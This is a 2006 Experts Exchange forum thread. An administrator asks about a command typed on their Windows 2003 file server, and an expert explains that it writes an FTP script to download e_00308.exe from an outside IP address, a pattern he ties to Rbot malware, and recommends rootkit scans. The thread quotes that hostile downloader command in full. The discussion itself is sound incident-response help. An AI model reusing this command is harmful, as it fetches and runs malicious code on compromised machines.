Solved

Command run on file server to connect to FTP Server Windows 2003 Server

Posted on 2006-10-26
3
198 Views
Last Modified: 2010-04-18
Please help the following script was typed into the command run window by a remote user on our file server what does it do if anything


cmd.exe /c del i&echo open 88.112.47.74 7800 > i&echo  >> i &echo get e_00308.exe >> i &echo quit >> i &f

Please Help
0
Comment
Question by:guilogic
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
3 Comments
 
LVL 95

Accepted Solution

by:
Lee W, MVP earned 500 total points
ID: 17812885
It means:

Delete the file "i" if it exists.
echo (write) "open 88.112.47.74 7800" to the file "i"
Then echo "get e_00308.exe" to the file "i"
Then echo "quit"" to the file "i"

then run "f"

So you end up with a file "i" on your computer containing these three lines:

open 88.112.47.74 7800
get e_00308.exe
quit

This is an FTP script.

I saw very similar files on machines infected with malware and Rbot variants (Rbots typically include Root Kit technology).

I strongly suggest you run various AntiSpyware tools AND the tool RootKitRevealer and/or Sophos Root Kit detection tool - www.sophos.com and www.sysinternals.com (for RootKitRevealer)
0

Featured Post

Technology Partners: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
removing Exchange from an old windows 2003 DC 8 66
inactive users 13 89
Migration of AD user accounts from Server 2003 to 2012R2 5 120
Cannot take ownership of a folder 8 80
The HP utility "HP Lights-Out Online Configuration Utility for Windows Server 2003/2008" could be of great use when it comes to remotely configure a HP servers ILO WITHOUT rebooting the server. We would only need to create and run scripts using thi…
Recently, I had the need to build a standalone system to run a point-of-sale system. I’m running this on a low-voltage Atom processor, so I wanted a light-weight operating system, but still needed Windows. I chose to use Microsoft Windows Server 200…
Nobody understands Phishing better than an anti-spam company. That’s why we are providing Phishing Awareness Training to our customers. According to a report by Verizon, only 3% of targeted users report malicious emails to management. With compan…

730 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question